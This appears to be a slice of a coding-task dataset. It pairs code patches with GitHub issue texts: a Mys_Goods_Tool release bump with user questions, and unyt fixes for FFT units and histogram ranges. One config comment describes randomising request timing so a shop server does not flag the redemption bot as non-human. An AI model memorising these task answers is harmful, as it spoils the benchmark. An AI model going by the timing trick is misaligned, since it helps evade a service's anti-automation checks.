+- [**🔗完整说明文档**](https://github.com/Ljzd-PRO/Mys_Goods_Tool/wiki)
- 仅供学习时参考
- 相似项目推荐: \
-**mysTool - 米游社辅助工具插件** \
-简介:NoneBot2 插件 | 米游社工具-每日米游币任务、游戏签到、商品兑换、免抓包登录、原神树脂提醒 \
-🔗 https://github.com/Ljzd-PRO/nonebot-plugin-mystool
-
+ **mysTool - 米游社辅助工具插件** \
+ 简介:NoneBot2 插件 | 米游社工具-每日米游币任务、游戏签到、商品兑换、免抓包登录、原神树脂提醒 \
+ 🔗 https://github.com/Ljzd-PRO/nonebot-plugin-mystool
+
- 本项目已开启[🔗Github Actions](https://github.com/Ljzd-PRO/Mys_Goods_Tool/actions)。
-欢迎[🔗指出Bug](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues)和[🔗贡献代码](https://github.com/Ljzd-PRO/Mys_Goods_Tool/pulls)👏
+ 欢迎[🔗指出Bug](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues)
+ 和[🔗贡献代码](https://github.com/Ljzd-PRO/Mys_Goods_Tool/pulls)👏
- 开发版分支:[🔗dev](https://github.com/Ljzd-PRO/Mys_Goods_Tool/tree/dev/)
"""
diff --git a/mys_goods_tool/user_data.py b/mys_goods_tool/user_data.py
index c4c59e94..185c82c3 100644
--- a/mys_goods_tool/user_data.py
+++ b/mys_goods_tool/user_data.py
@@ -1,5 +1,4 @@
import os
-import traceback
from json import JSONDecodeError
from pathlib import Path
from typing import List, Union, Optional, Tuple, Any, Dict, Set, Callable, TYPE_CHECKING, AbstractSet, \
@@ -17,7 +16,7 @@
CONFIG_PATH = ROOT_PATH / "user_data.json"
"""用户数据文件默认路径"""
-VERSION = "2.0.0"
+VERSION = "2.0.1"
"""程序当前版本"""
if TYPE_CHECKING:
@@ -296,7 +295,7 @@ class Preference(BaseSettings):
"""登录时使用的 GEETEST行为验证 WEB服务 本地监听地址"""
exchange_thread_count: int = 2
"""兑换线程数"""
- exchange_latency: Tuple[float, float] = (0, 0.35)
+ exchange_latency: Tuple[float, float] = (0, 0.2)
"""兑换时间延迟随机范围(单位:秒)(防止因为发出请求的时间过于精准而被服务器认定为非人工操作)"""
enable_log_output: bool = True
"""是否保存日志"""
@@ -483,20 +482,17 @@ def load_config():
try:
return UserData.parse_file(CONFIG_PATH)
except (ValidationError, JSONDecodeError):
- logger.error(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 格式是否正确")
- logger.debug(traceback.format_exc())
+ logger.exception(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 格式是否正确")
exit(1)
except:
- logger.error(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 是否存在且程序有权限读取和写入")
- logger.debug(traceback.format_exc())
+ logger.exception(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 是否存在且程序有权限读取和写入")
exit(1)
else:
user_data = UserData()
try:
write_config_file(user_data)
except PermissionError:
- logger.error(f"创建用户数据文件失败,请检查程序是否有权限读取和写入 {CONFIG_PATH}")
- logger.debug(traceback.format_exc())
+ logger.exception(f"创建用户数据文件失败,请检查程序是否有权限读取和写入 {CONFIG_PATH}")
exit(1)
# logger.info(f"用户数据文件 {CONFIG_PATH} 不存在,已创建默认用户数据文件。")
# 由于会输出到标准输出流,影响TUI观感,因此暂时取消
diff --git a/pyproject.toml b/pyproject.toml
index 5fa55e8c..affedea6 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "mys-goods-tool"
-version = "2.0.0"
+version = "2.0.1"
description = "米游社商品兑换工具|短信验证登录|终端TUI界面"
authors = ["Ljzd-PRO <[email protected]>"]
readme = "README.md"
@@ -23,14 +23,14 @@ packages = [{ include = "mys_goods_tool" }]
[tool.poetry.dependencies]
python = ">=3.9,<3.12"
tenacity = "^8.2.2"
-requests = "^2.29.0"
+requests = "^2.30.0"
ping3 = "^4.0.4"
ntplib = "^0.4.0"
pydantic = "^1.10.6"
loguru = "^0.7.0"
httpx = "^0.24.0"
rich = "^13.3.5"
-textual = "^0.23.0"
+textual = "^0.24.1"
socksio = "^1.0.0"
apscheduler = "^3.10.1"
diff --git a/requirements.txt b/requirements.txt
index 7bbf6a24..0830a616 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,14 +2,14 @@
## main.dependencies
tenacity~=8.2.2
-requests~=2.29.0
+requests~=2.30.0
ping3~=4.0.4
ntplib~=0.4.0
pydantic~=1.10.6
loguru~=0.7.0
httpx~=0.24.0
rich~=13.3.5
-textual~=0.23.0
+textual~=0.24.1
socksio~=1.0.0
apscheduler~=3.10.1
| 打包文件在Ubuntu上报错 pip安装的如何共用json ssh链接应该如何让进程挂在后台
首先非常感谢您的项目,没想到现在已经出到了图形化界面,太强了!
我现在windows上试了一下感觉没什么问题,遇到的疑问来自我在一台Ubuntu服务器上的
系统:
```
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# lsb_release -a
LSB Version: core-11.1.0ubuntu2-noarch:security-11.1.0ubuntu2-noarch
Distributor ID: Ubuntu
Description: Ubuntu 20.04.5 LTS
Release: 20.04
Codename: focal
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# python -V
Python 3.9.16
```
### 打包文件在Ubuntu上报错
解压的是github action最新的一个
```
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys# tree
.
├── dist
│ └── Mys_Goods_Tool
├── Mys_Goods_Tool_v2-Linux-x86_64.zip
└── README.md
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys# cd dist/
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# ./Mys_Goods_Tool
[3980] Error loading Python lib '/tmp/_MEIXadoU3/libpython3.11.so.1.0': dlopen: /lib/x86_64-linux-gnu/libm.so.6: version `GLIBC_2.35' not found (required by /tmp/_MEIXadoU3/libpython3.11.so.1.0)
```
看了一下可能是版本不兼容的问题
### pip安装的如何共用json
然后我使用pip安装的方法可以正常运行,但是想问问应该如何共用json(因为我在windows上已经弄过一遍了,有个user_data.json,想偷个懒)
### ssh链接应该如何让进程挂在后台
还有如何让进程一直挂在后台,我有尝试用tmux和screen,但是似乎有什么冲突,导致鼠标无法点击
跟进至GEETEST 第四代行为验证
跟进至GEETEST 第四代行为验证
跟进至GEETEST 第四代行为验证
跟进至GEETEST 第四代行为验证
商品兑换中没有大别野的商品
你好,我能看到原神、星穹铁道的商品兑换,但是大别野的商品刷新不出来(我在app上确定是有商品且我的频道等级可以兑换该商品),想问下是没有实现还是程序有问题?
商品兑换中没有大别野的商品
你好,我能看到原神、星穹铁道的商品兑换,但是大别野的商品刷新不出来(我在app上确定是有商品且我的频道等级可以兑换该商品),想问下是没有实现还是程序有问题?
| 2023-05-10T14:13:00 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-531 | 55f1ac47b7adb967c14981029633bd5d16d1a7aa | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 4b22dd20..646629e2 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -358,72 +358,72 @@ def block(arrays):
@implements(np.fft.fft)
def ftt_fft(a, *args, **kwargs):
- return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fft2)
def ftt_fft2(a, *args, **kwargs):
- return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fftn)
def ftt_fftn(a, *args, **kwargs):
- return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.hfft)
def ftt_hfft(a, *args, **kwargs):
- return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfft)
def ftt_rfft(a, *args, **kwargs):
- return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfft2)
def ftt_rfft2(a, *args, **kwargs):
- return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfftn)
def ftt_rfftn(a, *args, **kwargs):
- return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifft)
def ftt_ifft(a, *args, **kwargs):
- return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifft2)
def ftt_ifft2(a, *args, **kwargs):
- return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifftn)
def ftt_ifftn(a, *args, **kwargs):
- return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ihfft)
def ftt_ihfft(a, *args, **kwargs):
- return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfft)
def ftt_irfft(a, *args, **kwargs):
- return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfft2)
def ftt_irfft2(a, *args, **kwargs):
- return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfftn)
def ftt_irfftn(a, *args, **kwargs):
- return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fftshift)
| unyt processes units for FFTs incorrectly
* unyt version: 3.0.3
* Python version: 3.12
* Operating System: MacOS
### Description
When using a fast Fourier transform, I expect the units that are returned to be the same as the original function. Dimensionally, the Fourier transform ($`F(k)`$) is a decomposition of the form:
$$f(x) ~= \int F(k) e^{-ikx} \cdot dk$$
However, when using the `np.fft` functions on `unyt` arrays, they return units that are the inverse of the original array.
For example, the minimal working example below:
```python
import matplotlib.pyplot as plt
import unyt
import numpy as np
# Dirac Delta
x = unyt.unyt_array(np.linspace(-5, 5, 128), "s", name="Time")
y = unyt.unyt_array(np.zeros_like(x.v), "K", name="Temperature")
y[len(y) // 2] = 1
# FFT that thing
fft = np.fft.fft(y)
amps = np.sqrt((fft * fft.conj()).real)
dk = 2.0 * np.pi / (10.0 * unyt.s)
k = np.fft.fftfreq(len(x), d=1.0 / dk) * len(x)
k.name = "Wavenumber $k$"
amps.name = "FFT of Temperature"
# Plot it up
with unyt.matplotlib_support:
fig, (axreal, axfft) = plt.subplots(1, 2, figsize=(6, 2.5))
axreal.plot(x, y)
axfft.plot(k, amps)
fig.tight_layout()
plt.show()
```
This produces the following figure:
<img width="879" alt="Screenshot 2024-10-25 at 8 20 19 AM" src="https://github.com/user-attachments/assets/f424a07f-2a50-41b7-996e-164781532950">
edit by @neutrinoceros: fixed latex formatting
| oof. Thanks for catching this. That's a two y.o. mistake I made in https://github.com/yt-project/unyt/pull/313
It should be pretty straight forward to fix though, once you know where to look (and the affected code is pretty much self-contained in #313). Are you interested in giving it a go yourself ?
Yes, I can take a look. For sanity's sake, I just checked all this with astropy, which gives the correct units:
```python
import matplotlib.pyplot as plt
from astropy.visualization import quantity_support
import astropy.units as u
import numpy as np
quantity_support()
# Dirac Delta
x = np.linspace(-5, 5, 128) * u.s
y = np.zeros_like(x.value) * u.K
y[len(y) // 2] = 1 * u.K
# FFT that thing
fft = np.fft.fft(y)
amps = np.sqrt((fft * fft.conj()).real)
dk = 2.0 * np.pi / (10.0 * u.s)
k = np.fft.fftfreq(len(x), d=1.0 / dk) * len(x)
# Plot it up
fig, (axreal, axfft) = plt.subplots(1, 2, figsize=(6, 2.5))
axreal.plot(x, y)
axfft.plot(k, amps)
fig.tight_layout()
plt.show()
```
<img width="594" alt="Screenshot 2024-10-25 at 9 10 42 AM" src="https://github.com/user-attachments/assets/3ede0992-b7eb-4736-8239-4c2a77a7cda9">
(yes, I also had a look at how astropy does it before I applied the "bug" label, to make sure I didn't just copied a bug from there and made my *own* mistakes :) ) | 2024-10-25T13:56:11 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-466 | bba2d872241886b56d22eb1dc338cb62c214b019 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index ded81b49..e288d27e 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -146,9 +146,16 @@ def _sanitize_range(_range, units):
ilim = _range[2 * i : 2 * (i + 1)]
imin, imax = ilim
if not (hasattr(imin, "units") and hasattr(imax, "units")):
- raise TypeError(
- f"Elements of range must both have a 'units' attribute. Got {_range}"
- )
+ if len(units) == 1:
+ # allow range to be pure numerical scalars
+ # for backward compatibility with unyt 2.9.5
+ # see https://github.com/yt-project/unyt/issues/465
+ imin *= units[0]
+ imax *= units[0]
+ else:
+ raise TypeError(
+ f"Elements of range must both have a 'units' attribute. Got {_range}"
+ )
new_range[i] = imin.to_value(units[i]), imax.to_value(units[i])
return new_range.squeeze()
| BUG: (NEP 18) np.histogram raises TypeError for range using implicit units
* unyt version: 3.0.0
* Python version: any
* Operating System: any
### Description
This is a regression in unyt 3.0.0, discovered in testing yt's cookbook.
### What I Did
```python
import unyt as un
import numpy as np
np.histogram(
un.unyt_array([0, 1, 2, 3], 'yr'),
bins=2,
range=[0, 5e8], # years
)
```
```
Traceback (most recent call last):
File "/Users/robcleme/dev/yt-project/yt/g.py", line 4, in <module>
np.histogram(
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/array.py", line 2034, in __array_function__
return _HANDLED_FUNCTIONS[func](*args, **kwargs)
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/_array_functions.py", line 164, in histogram
range = _sanitize_range(range, units=[a.units])
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/_array_functions.py", line 149, in _sanitize_range
raise TypeError(
TypeError: Elements of range must both have a 'units' attribute. Got [0, 500000000.0]
```
The error message, which is 100% intentional, hints a the preferred way to call this function by making units explicit:
```python
import unyt as un
import numpy as np
np.histogram(
un.unyt_array([0, 1, 2, 3], 'yr'),
bins=2,
range=un.unyt_array([0, 5e8], 'yr'),
)
```
however, this doesn't work with unyt 2.9.5.
The only way to write this code that's portable against unyt 2.9.5 and unyt 3.0.0 is to strip units, which is less than ideal. In hindsight, I think it should still be allowed to use implicit units for the range argument here. I'll try to come up with a non-invasive fix.
| 2023-11-02T10:23:03 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-464 | becb26d12ee11bb1af74790c1433b056ad7f89f8 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 85edd6a1..01e163b8 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -68,10 +68,8 @@ def array2string(a, *args, **kwargs):
def product_helper(a, b, out, func):
prod_units = getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
if out is None:
- return func._implementation(a.view(np.ndarray), b.view(np.ndarray)) * prod_units
- res = func._implementation(
- a.view(np.ndarray), b.view(np.ndarray), out=out.view(np.ndarray)
- )
+ return func._implementation(np.asarray(a), np.asarray(b)) * prod_units
+ res = func._implementation(np.asarray(a), np.asarray(b), out=np.asarray(out))
if getattr(out, "units", None) is not None:
out.units = prod_units
return unyt_array(res, prod_units, bypass_validation=True)
@@ -84,14 +82,14 @@ def dot(a, b, out=None):
@implements(np.vdot)
def vdot(a, b):
- return np.vdot._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.vdot._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@implements(np.inner)
def inner(a, b):
- return np.inner._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.inner._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@@ -103,14 +101,14 @@ def outer(a, b, out=None):
@implements(np.kron)
def kron(a, b):
- return np.kron._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.kron._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@implements(np.linalg.inv)
def linalg_inv(a, *args, **kwargs):
- return np.linalg.inv._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.linalg.inv._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.linalg.tensorinv)
@@ -127,7 +125,7 @@ def linalg_pinv(a, *args, **kwargs):
def linalg_svd(a, full_matrices=True, compute_uv=True, *args, **kwargs):
ret_units = a.units
retv = np.linalg.svd._implementation(
- a.view(np.ndarray), full_matrices, compute_uv, *args, **kwargs
+ np.asarray(a), full_matrices, compute_uv, *args, **kwargs
)
if compute_uv:
u, s, vh = retv
@@ -170,7 +168,7 @@ def histogram(
):
range = _sanitize_range(range, units=[a.units])
counts, bins = np.histogram._implementation(
- a.view(np.ndarray), bins, range, *args, **kwargs
+ np.asarray(a), bins, range, *args, **kwargs
)
return counts, bins * a.units
@@ -179,7 +177,7 @@ def histogram(
def histogram2d(x, y, bins=10, range=None, *args, **kwargs):
range = _sanitize_range(range, units=[x.units, y.units])
counts, xbins, ybins = np.histogram2d._implementation(
- x.view(np.ndarray), y.view(np.ndarray), bins, range, *args, **kwargs
+ np.asarray(x), np.asarray(y), bins, range, *args, **kwargs
)
return counts, xbins * x.units, ybins * y.units
@@ -189,7 +187,7 @@ def histogramdd(sample, bins=10, range=None, *args, **kwargs):
units = [_.units for _ in sample]
range = _sanitize_range(range, units=units)
counts, bins = np.histogramdd._implementation(
- [_.view(np.ndarray) for _ in sample], bins, range, *args, **kwargs
+ [np.asarray(_) for _ in sample], bins, range, *args, **kwargs
)
return counts, tuple(_bin * u for _bin, u in zip(bins, units))
@@ -197,8 +195,7 @@ def histogramdd(sample, bins=10, range=None, *args, **kwargs):
@implements(np.histogram_bin_edges)
def histogram_bin_edges(a, *args, **kwargs):
return (
- np.histogram_bin_edges._implementation(a.view(np.ndarray), *args, **kwargs)
- * a.units
+ np.histogram_bin_edges._implementation(np.asarray(a), *args, **kwargs) * a.units
)
@@ -247,12 +244,12 @@ def concatenate(arrs, /, axis=0, out=None, *args, **kwargs):
ret_units = _validate_units_consistency(arrs)
if out is not None:
- out_view = out.view(np.ndarray)
+ out_view = np.asarray(out)
else:
out_view = out
res = np.concatenate._implementation(
- [_.view(np.ndarray) for _ in arrs], axis, out_view, *args, **kwargs
+ [np.asarray(_) for _ in arrs], axis, out_view, *args, **kwargs
)
if getattr(out, "units", None) is not None:
@@ -265,9 +262,7 @@ def concatenate(arrs, /, axis=0, out=None, *args, **kwargs):
def cross(a, b, *args, **kwargs):
prod_units = getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
return (
- np.cross._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.cross._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* prod_units
)
@@ -276,8 +271,8 @@ def cross(a, b, *args, **kwargs):
def intersect1d(arr1, arr2, /, assume_unique=False, return_indices=False):
_validate_units_consistency((arr1, arr2))
retv = np.intersect1d._implementation(
- arr1.view(np.ndarray),
- arr2.view(np.ndarray),
+ np.asarray(arr1),
+ np.asarray(arr2),
assume_unique=assume_unique,
return_indices=return_indices,
)
@@ -290,41 +285,36 @@ def intersect1d(arr1, arr2, /, assume_unique=False, return_indices=False):
@implements(np.union1d)
def union1d(arr1, arr2, /):
_validate_units_consistency((arr1, arr2))
- return (
- np.union1d._implementation(arr1.view(np.ndarray), arr2.view(np.ndarray))
- * arr1.units
- )
+ return np.union1d._implementation(np.asarray(arr1), np.asarray(arr2)) * arr1.units
@implements(np.linalg.norm)
def norm(x, /, *args, **kwargs):
- return np.linalg.norm._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
+ return np.linalg.norm._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.vstack)
def vstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.vstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.vstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.hstack)
def hstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.vstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.vstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.dstack)
def dstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.dstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.dstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.column_stack)
def column_stack(tup, /):
ret_units = _validate_units_consistency(tup)
- return (
- np.column_stack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
- )
+ return np.column_stack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.stack)
@@ -332,11 +322,11 @@ def stack(arrays, /, axis=0, out=None):
ret_units = _validate_units_consistency(arrays)
if out is None:
return (
- np.stack._implementation([_.view(np.ndarray) for _ in arrays], axis=axis)
+ np.stack._implementation([np.asarray(_) for _ in arrays], axis=axis)
* ret_units
)
res = np.stack._implementation(
- [_.view(np.ndarray) for _ in arrays], axis=axis, out=out.view(np.ndarray)
+ [np.asarray(_) for _ in arrays], axis=axis, out=np.asarray(out)
)
if getattr(out, "units", None) is not None:
out.units = ret_units
@@ -347,11 +337,9 @@ def stack(arrays, /, axis=0, out=None):
def around(a, decimals=0, out=None):
ret_units = a.units
if out is None:
- return (
- np.around._implementation(a.view(np.ndarray), decimals=decimals) * ret_units
- )
+ return np.around._implementation(np.asarray(a), decimals=decimals) * ret_units
res = np.around._implementation(
- a.view(np.ndarray), decimals=decimals, out=out.view(np.ndarray)
+ np.asarray(a), decimals=decimals, out=np.asarray(out)
)
if getattr(out, "units", None) is not None:
out.units = ret_units
@@ -366,91 +354,87 @@ def block(arrays):
@implements(np.fft.fft)
def ftt_fft(a, *args, **kwargs):
- return np.fft.fft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fft2)
def ftt_fft2(a, *args, **kwargs):
- return np.fft.fft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fftn)
def ftt_fftn(a, *args, **kwargs):
- return np.fft.fftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.hfft)
def ftt_hfft(a, *args, **kwargs):
- return np.fft.hfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfft)
def ftt_rfft(a, *args, **kwargs):
- return np.fft.rfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfft2)
def ftt_rfft2(a, *args, **kwargs):
- return np.fft.rfft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfftn)
def ftt_rfftn(a, *args, **kwargs):
- return np.fft.rfftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifft)
def ftt_ifft(a, *args, **kwargs):
- return np.fft.ifft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifft2)
def ftt_ifft2(a, *args, **kwargs):
- return np.fft.ifft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifftn)
def ftt_ifftn(a, *args, **kwargs):
- return np.fft.ifftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ihfft)
def ftt_ihfft(a, *args, **kwargs):
- return np.fft.ihfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfft)
def ftt_irfft(a, *args, **kwargs):
- return np.fft.irfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfft2)
def ftt_irfft2(a, *args, **kwargs):
- return np.fft.irfft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfftn)
def ftt_irfftn(a, *args, **kwargs):
- return np.fft.irfftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fftshift)
def fft_fftshift(x, *args, **kwargs):
- return (
- np.fft.fftshift._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
- )
+ return np.fft.fftshift._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.fft.ifftshift)
def fft_ifftshift(x, *args, **kwargs):
- return (
- np.fft.ifftshift._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
- )
+ return np.fft.ifftshift._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.sort_complex)
def sort_complex(a):
- return np.sort_complex._implementation(a.view(np.ndarray)) * a.units
+ return np.sort_complex._implementation(np.asarray(a)) * a.units
def _array_comp_helper(a, b):
@@ -469,17 +453,13 @@ def _array_comp_helper(a, b):
@implements(np.isclose)
def isclose(a, b, *args, **kwargs):
a, b = _array_comp_helper(a, b)
- return np.isclose._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ return np.isclose._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
@implements(np.allclose)
def allclose(a, b, *args, **kwargs):
a, b = _array_comp_helper(a, b)
- return np.allclose._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ return np.allclose._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
@implements(np.array_equal)
@@ -490,7 +470,7 @@ def array_equal(a1, a2, *args, **kwargs) -> bool:
return False
return np.array_equal._implementation(
- a1.view(np.ndarray), a2.view(np.ndarray), *args, **kwargs
+ np.asarray(a1), np.asarray(a2), *args, **kwargs
)
@@ -502,7 +482,7 @@ def array_equiv(a1, a2, *args, **kwargs) -> bool:
return False
return np.array_equiv._implementation(
- a1.view(np.ndarray), a2.view(np.ndarray), *args, **kwargs
+ np.asarray(a1), np.asarray(a2), *args, **kwargs
)
@@ -511,7 +491,7 @@ def linspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.linspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -522,7 +502,7 @@ def logspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.logspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -533,7 +513,7 @@ def geomspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.geomspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -551,54 +531,50 @@ def copyto(dst, src, *args, **kwargs):
@implements(np.prod)
def prod(a, *args, **kwargs):
- return (
- np.prod._implementation(a.view(np.ndarray), *args, **kwargs) * a.units**a.size
- )
+ return np.prod._implementation(np.asarray(a), *args, **kwargs) * a.units**a.size
@implements(np.var)
def var(a, *args, **kwargs):
- return np.var._implementation(a.view(np.ndarray), *args, **kwargs) * a.units**2
+ return np.var._implementation(np.asarray(a), *args, **kwargs) * a.units**2
@implements(np.trace)
def trace(a, *args, **kwargs):
- return np.trace._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.trace._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.percentile)
def percentile(a, *args, **kwargs):
- return np.percentile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.percentile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.quantile)
def quantile(a, *args, **kwargs):
- return np.quantile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.quantile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.nanpercentile)
def nanpercentile(a, *args, **kwargs):
- return (
- np.nanpercentile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
- )
